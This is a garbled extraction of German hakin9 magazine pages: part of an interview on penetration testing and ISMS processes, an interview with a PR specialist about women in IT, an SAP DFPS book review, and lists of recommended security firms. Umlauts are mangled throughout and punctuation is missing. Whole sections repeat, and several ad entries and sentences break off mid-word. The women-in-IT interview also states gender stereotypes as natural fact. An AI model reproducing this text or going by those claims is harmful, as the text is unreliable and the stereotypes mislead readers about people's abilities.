hakin9 Fuumlr welche Faumllle reichen Penetrationstests nicht ausTobias Glemser Das haumlngt von der Zieldefinition des Kunden ab und was man unter einem Penetrationstest versteht Bei Tele-Consulting sind alle Mitarbeiter nicht nur in technische Audits wie Penetrationstests eingebun-den sondern auch in prozessorientierte Beratungen und Audits wie z B ISO 27001 oder BSI IT-Grundschutz Dies ermoumlglicht es uns in technischen Audits nicht nur die technischen Luumlcken aufzuzeigen sondern auch auf fehlende oder mangelhafte Prozesse hinzuweisen und konkrete Vorschlaumlge zur Verbesserung zu geben
hakin9 Koumlnnen Sie uns ein konkretes Beispiel nennenTobias Glemser Nehmen wir an dass aus Wirtschaft-lichkeitsgruumlnden nicht alle Server in einem Netz in ein technisches Audit einbezogen werden sondern nur eine definierte Anzahl Stellt man hier Schwachstellen fest so genuumlgt es nicht die erkannten Schwachstellen oder gar Luumlcken zu schlieszligen sondern man muss sich fra-gen wie es zu den Schwachstellen kommen konnte In den seltensten Faumlllen haben hier Administratoren indi-viduelle Fehler gemacht vielmehr scheinen offensicht-lich die Vorgaben zur Serverkonfiguration bzw Haumlrtung nicht ausreichend zu sein bzw diese in ein Information Security Management System (ISMS) integriert zu sein Darauf weisen wir nachdruumlcklich in unseren Ergebnis-berichten hin um eine Gesamtverbesserung zu erzie-len und unterstuumltzen bei Bedarf auch bei der Umset-zung der organisatorischen Anteile
Geht man diesen Schritt nicht werden erfahrungs-gemaumlszlig nur die Systeme veraumlndert bei denen im Test Schwachstellen erkannt wurden Der Verbesserung der Gesamtsicherheit hilft dies dann allerdings nicht
hakin9 Wie sieht eine Sicherheitsuumlberpruumlfung mithilfe des Penetrationstests ausTobias Glemser Zunaumlchst bedarf es einer klaren Ziel-vorstellung Entweder haben Kunden diese bereits oder sie wird im Rahmen eines Workshops gemeinsam erarbeitet Dabei ist es meist sinnvoll mehrstufig vorzu-gehen und die Themen in verschiedenen Arbeitspake-ten abzuarbeiten Im Rahmen eines Kick-Offs werden die Beteiligten informiert und in den Ablauf integriert
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
die Implementierung von Security-Loumlsungen
Schutz vor konkreten Gefahren
wwwpericomat
Happy-Security ist ein neues Portal mit Secu-
rity-Challanges IT-Quiz Web-Bibliothek Multi-
media-Center amp vielen weiteren Features
wwwhappy-securityde
CloudSafe stellt seinen Nutzern eine Plattform
zur kryptographisch sicheren Ablage und Verwal-
tung von sensiblen Daten zur Verfuumlgung Nutzer
koumlnnen auf CloudSafe beliebig viele Dokumente
in virtuellen Safes ablegen Es koumlnnen weite-
ren Personen individuelle Zugriffsrechte auf die
Safes eingeraumlumt und somit ein sicherer Daten-
austausch ermoumlglicht werden
wwwcloudsafecom
AV-Comparatives geht hervor aus dem Inns-
brucker Kompetenzzentrum und gilt als eines
der bekanntesten unabhaumlngigen Testhaumluser
fuumlr Antiviren-Software
wwwav-comparativesorg
Die Seed Forensics GmbH bietet fuumlr Strafver-
folgungsbehoumlrden professionelle Unterstuumltzung
in den Bereichen der Datensicherstellung und
Datentraumlgerauswertung Selbstverstaumlndlich
entsprechen unsere Mitarbeiter unser tech-
nisches Equipment und auch unsere Raumlumli-
chkeiten den notwendigen Anforderungen
wwwseed-forensicsde
Wollen Sie Ihre Seite empfehlen kontaktieren Sie bitte dehakin9org
Die Netzwerktechnik steht auf wwweasy-ne-
tworkde im Mittelpunkt Artikel Tutorials und
ein Forum bieten genuumlgen Stoff fuumlr kommende
wwweasy-networkde
Computerfreaks houmlher schlagen laumlsst Geek
Wear mit intelligenten Spruumlchen eine riesige
Auswahl Gadgets und natuumlrlich auch viele
Hacker Tools
wwwgetDigitalde
Recommended Companies
SEC ConsultSEC Consult ist der fuumlhrende Berater
fuumlr Information Security Consulting in
Zentraleuropa Die vollstaumlndige Unab-
haumlngigkeit von SW- und HW-Herstellern
macht uns zum echten Advisor unserer
Kunden Unsere Dienstleistungen umfa-
ssen externeinterne Sicherheitsaudits
(Web-) Applikationssicherheit (ONR 17-
700) Sicherheitsmanagement-Prozesse
(ISO 27001) etc
wwwsec-consultcom
SEC Consult
Tele-Consulting GmbH
Sicherheit hakin9 und crsquot Autoren jah-
relange Erfahrung bei der Durchfuumlhrung
von Penetrationstests und Security-Au-
dits eigener Security Scanner bdquotajanasrdquo
Sicherheitskonzepte Risikoanalysen
ISO 27001-Auditoren VoIP-Planung
und -Security
wwwtele-consultingcom
B1 SystemsDie B1 Systems ist international taumltig
in den Bereichen LinuxOpen Source
B1
Systems spezialisiert sich in den Be-
reichen Virtualisierung und Cluster
infob1-systemsde
wwwb1-systemsde
Blossey amp Partner
Consulting DatenschutzbuumlroDatenschutz ist EU-weit gesetzliche An-
forderung Wir sorgen fuumlr die Erfuumlllung
rechtlicher Vorschriften und kuumlmmern
uns um ein angemessenes Daten-
schutzniveau in Ihrem Unternehmen
auch international Wir erledigen alle er-
forderlichen Aufgaben die Faumlden behal-
ten Sie in der Hand Nutzen Sie unser
Erstberatungsgespraumlch
wwwblossey-partnerde
secXtreme GmbHschuumltzt Ihre Web-Anwendungen bis
auf Applikationsebene Dazu gehoumlrt
sowohl die Pruumlfung von Applikationen
(Pentests und Code-Reviews) als auch
Beratungsleistungen fuumlr Sicherheit im
Entwicklungsprozess und Schutzlouml-
sungen (Web Application Firewalls) bei
Mittelstand
wwwsec-Xtremecom
Mabunta
spezialisierter und kompetenter Partner
heitsfragen in allen Unternehmens-
bereichen verbinden Wachstum mit
sicherer Kommunikation
Alles in allem- mabunta bdquoone-face-to-
the-customerldquo Ihr Spezialist in Fragen
wwwmabuntade
Recommended Companies
SecureNet GmbH MuumlnchenAls Softwarehaus und Web Application
Security Spezialist bieten wir Expertise
rund um die Sicherheit von Webanwen-
dungen Anwendungs-Pentests Sour-
delines Beratung rund um den Software
Firewalls Application Scanner Fortify
wwwsecurenetde
underground_8
secure computing gmbhWir entwickeln und vertreiben securi-
und Antispam Unsere Loumlsungen sind
hardwarebasiert und werden uumlber Dis-
tributoren Reseller und Systemintegra-
toren implementiert und vertrieben
wwwunderground8com
OPTIMAbit GmbHWir sind Spezialisten fuumlr Entwicklung
und Mobile Applikationen gegen Angriffe
externer und interner Art Unsere Dien-
ste umfassen Audits Code Reviews
Penetrationstest sowie die Erstellung
von Policies Zusaumltzlich bieten wir Semi-
wwwoptimabitcom
m-privacy GmbH
einfach zu bedienen
So praumlsentieren sich die von m-privacy
tesiegel Es bietet als erstes System
weltweit einen kompletten Schutz vor
Online-Spionage Online-Razzien und
gezielten Angriffen
wwwm-privacyde
NESECNESEC ist Ihr Spezialist fuumlr Penetra-
tionstests Sicherheitsanalysen und
cherheitspruumlfungen Ihrer Netzwerke
und Webapplikationen sowie bei Sour-
ce Code Audits Bei Bedarf optimieren
wir Ihre Policy sensibilisieren Ihre
nehmen nach ISO 27001
wwwnesecde
Seed Forensics GmbH
fuumlr Strafverfolgungsbehoumlrden profe-
ssionelle Unterstuumltzung in den
Bereichen der Datensicherstellung
und Datentraumlgerauswertung Selbst-
verstaumlndlich entsprechen unsere
Mitarbeiter unser technisches Equip-
0ment und auch unsere Raumlumlichkeiten
den notwendigen Anforderungen
wwwseed-forensicsde
Protea Networks
Loumlsungen Verschluumlsselung Firewall
ring etc Wir bieten umfassende Bera-
tung Vertrieb von Security-Hard- und
Software Installation und umfangreiche
nings) Protea setzt auf Loumlsungen der
dafuumlr direkten inhouse-Support bereit
wwwproteanetworksde
secadmsecadm ist durchtrainierter Spezialist fuumlr
Airbags ABS und Sicherheitsgurte in der
Mannjahren Erfahrung beraten entwi-
fuumlr Kunden weltweit Der Fokus liegt da-
und Security-Management Risiko-Analy-
se die Sicherheitsberatung Auditing Se-
curity-Leitfaumlden Software-Entwicklung
wwwsecadmde
10201044
INTERVIEW
hakin9 Lassen Sie uns bitte ein wenig uumlber sich selbst wissen wer sind Sie was machen Sie und wie ist es dazu gekommen dass Sie in der IT-Branche taumltig sindUlrike Peter Ich bin PR-Spezialistin und Journalis-tin durch und durch Die Liebe zum Schreiben ent-deckte ich fruumlh Nach ersten Gehversuchen als freie Mitarbeiterin bei einer Tageszeitung absolvierte ich vor zehn Jahren ein Volontariat in einer PR-Agentur mit parallelem Fernstudium bdquoJournalismusldquo Die ers-ten Tage in der Agentur waren wie ein Kopfsprung ins kalte Wasser Denn obwohl ich das journalistische Ruumlstzeug besaszlig wusste ich anfangs nicht mal wo sich die Escape-Taste an meinem PC befand hatte aber die Aufgabe ohne spezielles Hintergrundwissen uumlber komplexe Technologien detaillierte Berichte zu formulieren Da dies den Ehrgeiz in mir weckte ar-beitete ich mich schnell in die Materie ein und stell-te fest dass Public Relations in Verbindung mit der Erstellung technologischer Texte mein Steckenpferd ist Heute bin ich Geschaumlftsfuumlhrerin meiner eigenen PR-Agentur und obwohl ich mittlerweile auch in wei-teren Branchen und Aufgabengebieten zuhause bin ist die Freude daran bdquotrockeneldquo und komplexe Inhalte lebendig werden zu lassen noch genauso vorhanden wie am ersten Tag
hakin9 Viele glauben dass Computer Maumlnnersache sind Was halten Sie davonUlrike Peter Die landlaumlufige Meinung existiert nach wie vor dass Maumlnner ein besseres technologisches Verstaumlndnis mitbringen Dies resultiert nicht selten aus Vorurteilen laumlsst sich aber auch nicht komplett abstreiten Denn nicht nur Erfahrungswerte sondern auch Belege aus der Hirnforschung zeigen dass Frauen besser mit Sprache umgehen koumlnnen und Maumlnner sich in Naturwissenschaften wohler fuumlhlen Es liegt wohl ein Stuumlck weit in der Natur der Sache
Aber wie heiszligt es so schoumln bdquoAusnahmen bestaumltigen die Regelldquo Und der Trend zeigt beispielsweise dass Frauen zunehmend technische Studiengaumlnge bele-gen
hakin9 Heutzutage sind wir uumlberall von Computern umgeben In der IT-Branche herrscht trotzdem ein Frauenmangel Woran liegt dies Ihrer Meinung nachUlrike Peter Noch lockt es wesentlich mehr Maumlnner in technische Berufe als Frauen Ich denke das Verhaumlltnis wird auch in Zukunft so bleiben ndash auch wenn sich die klassische Rollenverteilung verschiebt und die bdquoGren-
bdquoErfolgreiche Frauen in der IT-Branche - ein Erfahrungsberichtldquo
Interview mit Ulrike Peter
Interview mit Ulrike Peter
hakin9orgde 45
Vorgesetzten und zum anderen nach den Faumlhigkeiten der Frau Jeder Mitarbeiter der neu eingestellt wird steht vor der Aufgabe sich zu beweisen ndash und sollte die Moumlglichkeit dazu erhalten Jedoch werden Frau-en in typischen Maumlnnerberufen oft kritischer beaumlugt und stehen laumlnger auf dem Pruumlfstand Dies passiert teils unbewusst Auch beweisen Studien immer wie-der dass maumlnnliche Arbeitnehmer im gleichen Job mehr verdienen als weibliche Hier macht die Gesell-schaft aber eine Entwicklung durch und dies reguliert sich sicherlich zumindest ein Stuumlck weit im Laufe der naumlchsten Jahre
hakin9 Was macht Ihnen am meisten Spaszlig bei der Arbeit in der IT-BrancheUlrike Peter Bevor ich mich selbstaumlndig machte war ich bereits in einem anderen Unternehmen in der Ge-schaumlftsleitung taumltig ndash jedoch konnte ich den Stift zum Schreiben nie aus der Hand legen Es reizt mich im-mer wieder neue technologische Themen zu erkunden und dabei nicht nur an der Oberflaumlche zu kratzen son-dern Detailtiefe zu erlangen um fundiert und lesens-wert uumlber ein Thema berichten zu koumlnnen Im Laufe der Jahre habe ich eine starke Affinitaumlt zur IT-Security entwickelt Ich finde es spannend uumlber Sicherheits-luumlcken Verschluumlsselungstechniken und vieles weite-re zu schreiben Daruumlber hinaus macht es mir groszligen Spaszlig IT-Unternehmen durch die richtige PR-Strategie nach vorn zu bringen und entsprechende Maszlignahmen in die Tat umsetzen Beim Kennenlernen eines poten-ziellen Neukunden im ersten Moment manchmal hin-sichtlich der technischen Fachkompetenz unterschaumltzt zu werden und dann schnell durch Know-how zu uumlber-zeugen bestaumltigt mich immer wieder in dem was ich tue
hakin9 Was sollte unternommen werden um die Ressentiments von Frauen gegenuumlber IT-Jobs abzubauenUlrike Peter Ich glaube dem kann man bzw Frau nur entgegenwirken indem sie den Mut hat ihre Interessen zu verfolgen und sie unter Beweis zu stellen Aus Er-fahrung wenn jemand seine Faumlhigkeiten zeigt und en-gagiert an eine Sache herangeht ruumlckt das Geschlecht automatisch in den Hintergrund
Wir bedanken uns fuumlr das Gespraumlch
zenldquo in beide Richtungen mehr und mehr verschwim-men Denn auch Maumlnner finden wir heute in Berufen die vor Jahren ausschlieszliglich Frauen zugeordnet wur-den Und wir sind zwar von elektronischen Geraumlten wie PCs Smartphones etc umgeben und diese werden auch rege von beiden Geschlechtern genutzt ndash aber ei-nen technischen Job zu ergreifen ist ein anderes paar Schuhe Hierzu gehoumlrt ein besonderes Faible Die Be-weggruumlnde weshalb in diesem Segment Frauenman-gel herrscht sind meiner Meinung nach Ihnen fehlt manchmal der Mut sie erhalten nicht immer die glei-chen Chancen oder ndash und das wird der Hauptgrund sein ndash es liegen schlichtweg die Interessen in anderen Be-reichen
hakin9 Woraus resultieren die Vorurteile gegen die Frauen die sich mit Computern beschaumlftigenUlrike Peter Die IT ist (und bleibt es sicher auch) eine Maumlnnerdomaumlne ndash Frauen in der IT-Branche sind Para-diesvoumlgel Wie in allen Berufen in denen seit jeher ein Geschlecht etabliert ist sich Prozesse eingeschliffen und bewaumlhrt haben ist es erst einmal fremd und ge-woumlhnungsbeduumlrftig wenn sie sich veraumlndern So liegen die Vorurteile zum einen daran dass es nicht uumlblich ist wenn Frauen in diesen Berufen arbeiten und Maumlnnern die bdquoTechnikldquo zugeordnet wird ndash zum anderen resultie-ren sie daraus dass die unterschiedlichen Faumlhigkeiten und Interessen der Geschlechter einfach naturgege-ben sind So wie kleine Jungen mit Autos spielen und Maumldchen mit Puppen stecken auch spaumlter gewisse Verhaltensweisen und Interessen in uns die bereits in der Kindheit gepraumlgt werden Greift das weibliche Ge-schlecht im Berufsleben ploumltzlich zum bdquoAutoldquo so ist dies ungewoumlhnlich und wird erst einmal hinterfragt
hakin9 Wie sieht die Situation von Frauen in der IT-Branche aus Ist es leicht als begabte IT-Expertin einen Job in einem Unternehmen zu bekommenUlrike Peter Frauen in der IT-Branche sind haumlufig in Marketingabteilungen zu finden ndash aber zum Beispiel auch bei der schreibenden Zunft in Fachverlagen In diesen Jobs herrscht in meinen Augen Chancengleich-heit Als IT-Expertin in einem technischen Beruf wie Ad-ministrator Entwickler oder Aumlhnliches sieht es dagegen anders aus In diesem Segment haben es weibliche Fachkraumlfte meiner Ansicht nach schwerer Die Huumlrde zum Bewerbungsgespraumlch eingeladen zu werden ist houmlher Bekommt sie die Chance dazu wird vielleicht et-was genauer hingeschaut aber letztlich zaumlhlt die Kom-petenz die unterm Strich den entscheidenden Aus-schlag geben wird
hakin9 Wie werden Frauen von Maumlnnern als ihre Mitarbeiter wahrgenommenUlrike Peter Dies laumlsst sich nicht pauschalisieren und richtet sich zum einen nach der Einstellung des
10201046
REZENSIONEN
Das Buch SAP for DFPS Implementierung und Customizing basiert auf mehr als 20 Jahren Er-fahrung die die Autoren insgesamt bei der Ent-
wicklung Implementierung aber auch Schulung der Loumlsung sammeln konnten
Die uumlber 650 Seiten vollgepacktes Wissen sollten sie nicht abschrecken dieses Buch in die Hand zu nehmen Es ist sehr gut und fluumlssig geschrieben Man schafft es sollten sie ein schneller LeserIn sein in zwei Tagen
Sie benoumltigen keine tiefgreifenden SAP-Kenntnisse zum Verstaumlndnis daher ist es fuumlr Entscheider genauso geeignet wie fuumlr Projektleiter Architekten funktionale Mitarbeiter Basismitarbeiter oder externe Berater
Komplexe Zusammenhaumlnge werden sehr schoumln und bildhaft beschrieben damit auch fuumlr den SAP-Laien das Vorgehen verstaumlndlich beschrieben wird Erwaumlh-nenswert finde ich in diesem Zusammenhang Rubiks Zauberwuumlrfel
Das Buch ist sehr strukturiert aufgebaut und umfasst unverzichtbare Grundlagen in den Teilen I-IIIFuumlr Experten wird es dann in Teil IV richtig spannend und interessant
Die von SAP entwickelte fast eierlegende Wollmilch-sau erfordert ein umfangreiches Nachschlagewerk zur Implementierung Den Autoren ist dies hiermit gelun-gen
Ihnen ist es auszligerdem gelungen aufzuzeigen wie komplexe bdquoUnternehmensstrukturenldquo bewaumlltigt und Kos-ten reduziert und kontrolliert werden koumlnnen
Das Beispielprojekt bdquoTsunamildquo verdeutlicht dabei an einem nicht so komplexen Projekt die Anforderungen Beleuchtet wird zB wie militaumlrische Kernprozesse wie etwa die Logistik substanzielle Einsparungen von ca 30 erzielen koumlnnten als auch die Unterstuumltzung von Einsaumltzen verbessert werden koumlnnten (Beschleunigung der Verlegung um bis zu 50 -70)
Des Weiteren wird die Interoperabilitaumlt sehr schoumln he-raus gestellt und die integrativen Aspekte stets im Blick behalten
Hervorheben sollte man die organisatorische Flexi-bilitaumlt und Logistik wie das Logistic Assessment Pro-zessmanagement Qualification Management inkl der Uumlbernahme von Trainingsdaten das Managementkon-zept BSC (Balanced Scorcard) die Einsatzmoumlglichkei-ten von mobilen Anwendungen fuumlr Schutzaufgaben SOA und NCW bzw NetFuumlOp mit DFPS
Der Mehrwert wird zB am Meldewesen der NC3A durch Automatisierung von weiten Teilen schoumln heraus gearbeitet
Die ausfuumlhrlichen bebilderten Beispiele stellen eine gelungene Verbindung zwischen Theorie und Praxis bzw Anwendung dar In der SAP-typischen Struktur wurden die neuen und bereits erwaumlhnten Funktionen sinnvoll und gekonnt integriert
Des Weiteren findet sich fuumlr die richtige IT-Architektur ein schoumln gefuumlllter Werkzeugkasten mit den dazuge-houmlrigen Dorsquos and Dontrsquos Natuumlrlich darf auch das best practices nicht fehlen sowie der Ausblick auf zukuumlnftige Entwicklungen
Egal ob sie sich fuumlr eine Neuintegration oder eine Co-re2Defense Loumlsung entscheiden
die Kapitel zu den Themen
moumlchte ich ihnen unbedingt ans Herz legen
FAZITDieses Buch sollte keinem Entscheider und IT-Verant-wortlichen vorenthalten werden
Praumldikat besonders empfehlenswert
Autor Nicole Huck
SAP for DFPSImplementierung und CustomizingGalileo Press Bonn 20101 Auflage 2010AutorenBernhard EscherichHeinrich PfriemerWolfgang Ullwer
Datenschutz ist EU-weit gesetzliche Anforde-
rung Wir sorgen fuumlr die Erfuumlllung rechtlicher
Vorschriften und kuumlmmern uns um ein ange-
messenes Datenschutzniveau in Ihrem Unter-
nehmen auch international
wwwblossey-partnerde
Recommended Sites
Securitymanagerde ist eine Produktion des
Online-Verlag FEiG amp PARTNER Seit dem
Start hat sich Securitymanagerde zu einem
fuumlhrenden Online-Informationsportal in
Deutschland entwickelt und versteht sich als
unabhaumlngiger Informationsdienstleister der
IT- und Information-Security-Branche
wwwsecuritymanagerde
Pericom base camp IT-Security Unser Ziel ist
es unsere Kunden vor moumlglichen Gefahren
fuumlr Ihre IT-Infrastruktur bestmoumlglich zu schuumlt-
zen Neben der Analyse von Risikopotentia-
len durch Security Audits bieten wir durch
